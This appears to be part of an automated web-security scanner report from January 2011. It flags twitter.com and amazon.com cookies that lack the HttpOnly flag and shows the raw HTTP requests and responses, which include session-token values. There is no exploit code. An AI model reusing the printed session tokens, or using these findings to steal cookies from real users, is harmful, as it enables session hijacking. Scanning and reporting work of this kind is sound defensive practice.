guest_id=129635228597484210; path=/; expires=Tue, 01 Mar 2011 01:51:25 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /$1 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 30 Jan 2011 01:51:25 GMT Server: hi Status: 404 Not Found X-Transaction: 1296352285-22471-55414 Last-Modified: Sun, 30 Jan 2011 01:51:25 GMT Content-Type: text/html; charset=utf-8 Content-Length: 9230 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296352285964730; path=/; expires=Sun, 06-Feb-11 01:51:25 GMT; domain=.twitter.com Set-Cookie: guest_id=129635228597484210; path=/; expires=Tue, 01 Mar 2011 01:51:25 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToOcmV0dXJuX3RvIhpodHRwOi8vdHdpdHRlci5jb20vJDE6B2lkIiUz%250AMDJhZjczMTdmZTIxZDk3NzMzNDBiYTMyNDM0ZmVkYyIKZmxhc2hJQzonQWN0%250AaW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoP%250AY3JlYXRlZF9hdGwrCBcVntQtAQ%253D%253D--b2904d61596531162db12f902f763da54e6b7b41; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
guest_id=129635656738576607; path=/; expires=Tue, 01 Mar 2011 03:02:47 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /HelenASPopkin HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 30 Jan 2011 03:02:47 GMT Server: hi Status: 200 OK X-Transaction: 1296356567-38386-11000 ETag: "ea52c5afedc85cb07c6fff4a75310922" Last-Modified: Sun, 30 Jan 2011 03:02:47 GMT X-Runtime: 0.01712 Content-Type: text/html; charset=utf-8 Content-Length: 52277 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296356567344651; path=/; expires=Sun, 06-Feb-11 03:02:47 GMT; domain=.twitter.com Set-Cookie: guest_id=129635656738576607; path=/; expires=Tue, 01 Mar 2011 03:02:47 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWMwOWVkYzE1OTI2MDk0NDQ1ZGJiYjRjMmFiYmJlNTNlIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIW2nf1C0B--6f9e351ce1cfdf99abad41c8d129848e96fc4a8b; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
guest_id=129635654792136829; path=/; expires=Tue, 01 Mar 2011 03:02:27 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /MichaelWann HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 30 Jan 2011 03:02:27 GMT Server: hi Status: 200 OK X-Transaction: 1296356547-81727-2377 ETag: "8262f10ce7c81e5136cabe2a78847bad" Last-Modified: Sun, 30 Jan 2011 03:02:27 GMT X-Runtime: 0.01194 Content-Type: text/html; charset=utf-8 Content-Length: 52843 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296356547913422; path=/; expires=Sun, 06-Feb-11 03:02:27 GMT; domain=.twitter.com Set-Cookie: guest_id=129635654792136829; path=/; expires=Tue, 01 Mar 2011 03:02:27 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTNmZTg1NjI1MTBlYzM3OTk0YzQwOGRkYTcxODQyOTYzIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIUh3f1C0B--ba2b2e85d86e8242c7c9defb78d02e28bd4f565e; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
guest_id=129635052817015374; path=/; expires=Tue, 01 Mar 2011 01:22:08 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 302 Found Date: Sun, 30 Jan 2011 01:22:08 GMT Server: hi Status: 302 Found Location: http://twitter.com/login?redirect_after_login=%2Fhome X-Runtime: 0.00200 Content-Type: text/html; charset=utf-8 Content-Length: 119 Cache-Control: no-cache, max-age=300 Set-Cookie: k=173.193.214.243.1296350528168573; path=/; expires=Sun, 06-Feb-11 01:22:08 GMT; domain=.twitter.com Set-Cookie: guest_id=129635052817015374; path=/; expires=Tue, 01 Mar 2011 01:22:08 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToOcmV0dXJuX3RvIhxodHRwOi8vdHdpdHRlci5jb20vaG9tZToHaWQi%250AJWRjMWRmOThmMDAwNDUzYjkyYTM3NmFmOTNjNGU0MTQ5IgpmbGFzaElDOidB%250AY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA%250AOg9jcmVhdGVkX2F0bCsIq0KD1C0B--af7bf9547cbf91a6342f4ce9df7d07f956b84c1c; domain=.twitter.com; path=/ Expires: Sun, 30 Jan 2011 01:27:08 GMT X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<html><body>You are being <a href="http://twitter.com/login?redirect_after_login=%2Fhome">redirected</a>.</body></html>
guest_id=12963522871862479; path=/; expires=Tue, 01 Mar 2011 01:51:27 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /status/user_timeline/ HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 30 Jan 2011 01:51:27 GMT Server: hi Status: 404 Not Found X-Transaction: 1296352287-29136-7189 Last-Modified: Sun, 30 Jan 2011 01:51:27 GMT Content-Type: text/html; charset=utf-8 Content-Length: 9230 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296352287179441; path=/; expires=Sun, 06-Feb-11 01:51:27 GMT; domain=.twitter.com Set-Cookie: guest_id=12963522871862479; path=/; expires=Tue, 01 Mar 2011 01:51:27 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWQwOTAwOWQ4YTEyZTkwNjk3ZWUwNjg3ZTU1MTZkODkwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI0xme1C0B--a43ce2094d1eef88867360254755d2f875798bf8; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
guest_id=12963565777757520; path=/; expires=Tue, 01 Mar 2011 03:02:57 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /windabenedetti HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 30 Jan 2011 03:02:57 GMT Server: hi Status: 200 OK X-Transaction: 1296356577-57560-43117 ETag: "37e7d4764aa4356aeb8c7f93b34df6b0" Last-Modified: Sun, 30 Jan 2011 03:02:57 GMT X-Runtime: 0.00997 Content-Type: text/html; charset=utf-8 Content-Length: 49069 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296356577758623; path=/; expires=Sun, 06-Feb-11 03:02:57 GMT; domain=.twitter.com Set-Cookie: guest_id=12963565777757520; path=/; expires=Tue, 01 Mar 2011 03:02:57 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWZiZjBlYjQ4OTMwMGMzOTA3Nzg4OTQxNTc0YzEzN2JmIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI8JHf1C0B--5fe442064eb48ecd736f8d0fc43646e6d9ffb6d4; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
guest_id=129635656362644604; path=/; expires=Tue, 01 Mar 2011 03:02:43 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wjrothman HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 30 Jan 2011 03:02:43 GMT Server: hi Status: 200 OK X-Transaction: 1296356563-11223-39959 ETag: "067321df962e685b47091af05f4b9fbc" Last-Modified: Sun, 30 Jan 2011 03:02:43 GMT X-Runtime: 0.01619 Content-Type: text/html; charset=utf-8 Content-Length: 49641 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296356563232205; path=/; expires=Sun, 06-Feb-11 03:02:43 GMT; domain=.twitter.com Set-Cookie: guest_id=129635656362644604; path=/; expires=Tue, 01 Mar 2011 03:02:43 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTVjMmFiMWM4ZTg4ZjRhNmE2N2QyZTlhMzYyMDlkNTNlIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIrFrf1C0B--3aa7bb9fe9c6795ddbbf9680544888cbf7541ea2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
guest_id=129635658185310608; path=/; expires=Tue, 01 Mar 2011 03:03:01 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ToddKenreck HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 30 Jan 2011 03:03:01 GMT Server: hi Status: 200 OK X-Transaction: 1296356581-64489-22662 ETag: "64fd45f3d163ffe5f3eb5309c6bbafbb" Last-Modified: Sun, 30 Jan 2011 03:03:01 GMT X-Runtime: 0.01332 Content-Type: text/html; charset=utf-8 Content-Length: 38284 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296356581648173; path=/; expires=Sun, 06-Feb-11 03:03:01 GMT; domain=.twitter.com Set-Cookie: guest_id=129635658185310608; path=/; expires=Tue, 01 Mar 2011 03:03:01 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCN%252Bh39QtAToHaWQiJTZkNWFlYzNiNjc5OTZk%250AN2JjM2EyOTg3YzdkNWU2Y2U5IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--0004367452c498e4750ca5a1e95bbdef70cffad9; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The following cookies were issued by the application and do not have the HttpOnly flag set:
session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=192-2919974-2112928; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=yQ9pIXqVNQ+kictSRtVelTJ1cwo6IQrEPJd+SWonrlO++kyS3eLyIk/nXbtbxx8D0mbpsSGjtlUuYe0vRowEBFX4sJLod/zu37k/IErBpleFnaz490Xa9SJrjYxKo9y6hu8Qw1NAIvP4UUaxU2L8jbY4r+JHs4ZKm4hST9QEmWm4QdymYv1J0wtClao472qWA+wllUTs9XnshUSKK5Zm7V07ZqJFh4wIijJE8gGWy6ub2Eb0pbSAyRM/8LmJTh6hNxn3d/uTTI7mbtQzIJuC04Uu58ASnyvxk5fZ6wzy7FLYCySmGxvLO1zbG7cicDX3t7BaUJKRVQDLOs9+B6raaQASSQzPOHnazizlJ7UsFvCoBiazT7uOFWxYUsf/18czWXcuM7antU7XxMLLqoSkfFWlqwjyu3ae8xXJ53xwMF3gWWGRilFqmd2KJU/GPs60FA1sCx6Rd0c=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:52 2011 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /gp/product/0470650923?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0470650923 HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:29:52 GMT Server: Server x-amz-id-1: 10BYGVG84SJDT6NK5QPW p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: Q88q6IxskVrNIWayV7qw53kBxjzbTCVGq9rikqIi4h0WIkQdBAnBtxKB8IUJkYyC Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=192-2919974-2112928; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: UserPref=yQ9pIXqVNQ+kictSRtVelTJ1cwo6IQrEPJd+SWonrlO++kyS3eLyIk/nXbtbxx8D0mbpsSGjtlUuYe0vRowEBFX4sJLod/zu37k/IErBpleFnaz490Xa9SJrjYxKo9y6hu8Qw1NAIvP4UUaxU2L8jbY4r+JHs4ZKm4hST9QEmWm4QdymYv1J0wtClao472qWA+wllUTs9XnshUSKK5Zm7V07ZqJFh4wIijJE8gGWy6ub2Eb0pbSAyRM/8LmJTh6hNxn3d/uTTI7mbtQzIJuC04Uu58ASnyvxk5fZ6wzy7FLYCySmGxvLO1zbG7cicDX3t7BaUJKRVQDLOs9+B6raaQASSQzPOHnazizlJ7UsFvCoBiazT7uOFWxYUsf/18czWXcuM7antU7XxMLLqoSkfFWlqwjyu3ae8xXJ53xwMF3gWWGRilFqmd2KJU/GPs60FA1sCx6Rd0c=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:52 2011 GMT Content-Length: 413393
The following cookies were issued by the application and do not have the HttpOnly flag set:
session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=185-0119564-6236271; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=Oel7bYwRWS1gKV5RSiNZiK5lZAAokMgjRBrE5HDUyc9ir04+EELG8B5ZvPf93p6q/Wug8LCjECLDGs1NV2Ss5CncqyEhzH4Xx7dc9WlLyukc31H5gDwd1M0N2+5dFhG9r9UQX7bBDo1UvRUWe9CKYp29GbQIzzh4/e34AfsAPvBx1HVvihnL6R0of1OO3HpDP4AGMQXekYYMU4xOPcaCZk0VUxYwQP/RumeAVnei2D4rad8Xugnf2lk0nqBj3rkP6vzCnoFEzmbe3GgDLzEstwODPn9gW6oauV3yNspeqzecQNyMXmsDy/UrRjAUYndEw91zCgoaiXhnp39HquunCVQJJv/M/EGP7xhqBuRl49vBAGLgp8yRAJwJEgmd86mQGKHoS1Ku4VfxXIMdaRhhkLOtFXZRjef7VWDgVqemNz4+2YF2kiCxAGs6W/ltnCEp33kcaW9Sa6E=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:33 2011 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /gp/product/0672333368?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0672333368 HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:29:33 GMT Server: Server x-amz-id-1: 04VBMFPBJXZ8J962J8W2 p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: fH3WLv3Jzmox2K4JTSORqyP3dG78f8/Z57/rsvJ+e57X3LhuWxe1LUoVMzwVuNdD Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=185-0119564-6236271; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: UserPref=Oel7bYwRWS1gKV5RSiNZiK5lZAAokMgjRBrE5HDUyc9ir04+EELG8B5ZvPf93p6q/Wug8LCjECLDGs1NV2Ss5CncqyEhzH4Xx7dc9WlLyukc31H5gDwd1M0N2+5dFhG9r9UQX7bBDo1UvRUWe9CKYp29GbQIzzh4/e34AfsAPvBx1HVvihnL6R0of1OO3HpDP4AGMQXekYYMU4xOPcaCZk0VUxYwQP/RumeAVnei2D4rad8Xugnf2lk0nqBj3rkP6vzCnoFEzmbe3GgDLzEstwODPn9gW6oauV3yNspeqzecQNyMXmsDy/UrRjAUYndEw91zCgoaiXhnp39HquunCVQJJv/M/EGP7xhqBuRl49vBAGLgp8yRAJwJEgmd86mQGKHoS1Ku4VfxXIMdaRhhkLOtFXZRjef7VWDgVqemNz4+2YF2kiCxAGs6W/ltnCEp33kcaW9Sa6E=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:33 2011 GMT Content-Length: 386121
The following cookies were issued by the application and do not have the HttpOnly flag set:
session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=192-4783126-1171450; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=w5NxRqtIaF3L4rahG0xqjBB3n3qFCUwofDp3zBWe5EhsjtbYur03xSjQJ9BybU0a50jcTNieFmXXtReKWFRC9VmjzXi0XOC/OFAKRnG7FxTSci1yzlHjHk93BdOFZd0lP2syU01bP9TPGDHRfsl3MIWGi6LFCm6KknGsRmeHY8fn9B/9V80kP771c+DIVHNbXgbdUStVjMbObwSMw0PsU1t5OEXrbvibQByiwa/enRat+18rO1z/R5x72/itj1Hgk/9qruaLuAMz0XARYys99VN3UXRqpAZ5ZdeRF0tpgFHr5oNT5iwGE41ntxzwpuWVgDuzqVnkzcVQMTPlrDEuvjne19cXXCziPz1UvkP6Lli9UrikpcpmBibUKKWw06dJpIda0iRpYtxcMRQ2Kw/KAsxg3VFJrlcfJyClK5xaGGuIOxZCz57xNTqoWJehRZwKjuk3GB7s/Rg=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:30:49 2011 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /gp/product/0981511821?ie=UTF8&tag=silverlightnet-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0981511821 HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:30:48 GMT Server: Server x-amz-id-1: 04T12HTYNC9C14B5HM4X p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: XeMb8ZphbyEceEV8uZ/rPWye3cxGU6y1x/oV8aO+RYhm6u/E/f5MILGVJEj9+KgY Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=192-4783126-1171450; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: UserPref=w5NxRqtIaF3L4rahG0xqjBB3n3qFCUwofDp3zBWe5EhsjtbYur03xSjQJ9BybU0a50jcTNieFmXXtReKWFRC9VmjzXi0XOC/OFAKRnG7FxTSci1yzlHjHk93BdOFZd0lP2syU01bP9TPGDHRfsl3MIWGi6LFCm6KknGsRmeHY8fn9B/9V80kP771c+DIVHNbXgbdUStVjMbObwSMw0PsU1t5OEXrbvibQByiwa/enRat+18rO1z/R5x72/itj1Hgk/9qruaLuAMz0XARYys99VN3UXRqpAZ5ZdeRF0tpgFHr5oNT5iwGE41ntxzwpuWVgDuzqVnkzcVQMTPlrDEuvjne19cXXCziPz1UvkP6Lli9UrikpcpmBibUKKWw06dJpIda0iRpYtxcMRQ2Kw/KAsxg3VFJrlcfJyClK5xaGGuIOxZCz57xNTqoWJehRZwKjuk3GB7s/Rg=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:30:49 2011 GMT Content-Length: 312688
The following cookies were issued by the application and do not have the HttpOnly flag set:
session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=180-2237308-2659866; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=eHjsire/T0R7tdwagP8TcPZKxHTTNNEzlEP0ADU6p9fDKp0HUddz5FB1vK4SWFnhMc+scZ3m3MMvdOoMBY3JMfDMgo9VyMfPoh4njOXzH+BQw3FF7fbIOVZ2IDZk0zQNft3m03t/gL+Tvy3Fp+s+IAXdK6TUGa3MgVEkoCKmlXgie4ZhutN7WZcgnsC2goxBTpcCUomgvJOn1FOsZJdpvaOeWwE7d4VopLfVs94lsjI1refuYz4Fh3eO4sF0scjQpxW30YkQtgxE21eMEFTpM3qzTPbz2A4In7Bgd+9yov6kS3a2jmHTnaE+PhrTEqnDDXpdHgngmPdiaQgXuM6nGSPUPALmbdC5KPrDo93c5AVJkz34KeYRlhnIYDw9LgulDl/Iq7uP7A0bF2cLU4kNTRvZoGaE4G4BI5Ct3/CXQEOqN+ABdMJN/2U0eTeT5lbUCjHlpbF1b4Y=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:30:20 2011 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /gp/product/184968006X?ie=UTF8&tag=silverlightnet-20&linkCode=xm2&camp=1789&creativeASIN=184968006X HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:30:20 GMT Server: Server x-amz-id-1: 0XKECKNR6H60A6C1P2PC p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: CcVgt8Ki3aGDcInLSZrXm3lZNlBFSwvoguF5oYlAkL7M50lOj+5ROXGiGrpYAFMx Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=180-2237308-2659866; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: UserPref=eHjsire/T0R7tdwagP8TcPZKxHTTNNEzlEP0ADU6p9fDKp0HUddz5FB1vK4SWFnhMc+scZ3m3MMvdOoMBY3JMfDMgo9VyMfPoh4njOXzH+BQw3FF7fbIOVZ2IDZk0zQNft3m03t/gL+Tvy3Fp+s+IAXdK6TUGa3MgVEkoCKmlXgie4ZhutN7WZcgnsC2goxBTpcCUomgvJOn1FOsZJdpvaOeWwE7d4VopLfVs94lsjI1refuYz4Fh3eO4sF0scjQpxW30YkQtgxE21eMEFTpM3qzTPbz2A4In7Bgd+9yov6kS3a2jmHTnaE+PhrTEqnDDXpdHgngmPdiaQgXuM6nGSPUPALmbdC5KPrDo93c5AVJkz34KeYRlhnIYDw9LgulDl/Iq7uP7A0bF2cLU4kNTRvZoGaE4G4BI5Ct3/CXQEOqN+ABdMJN/2U0eTeT5lbUCjHlpbF1b4Y=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:30:20 2011 GMT Content-Length: 400270
The following cookies were issued by the application and do not have the HttpOnly flag set:
session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=187-0383633-5130955; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
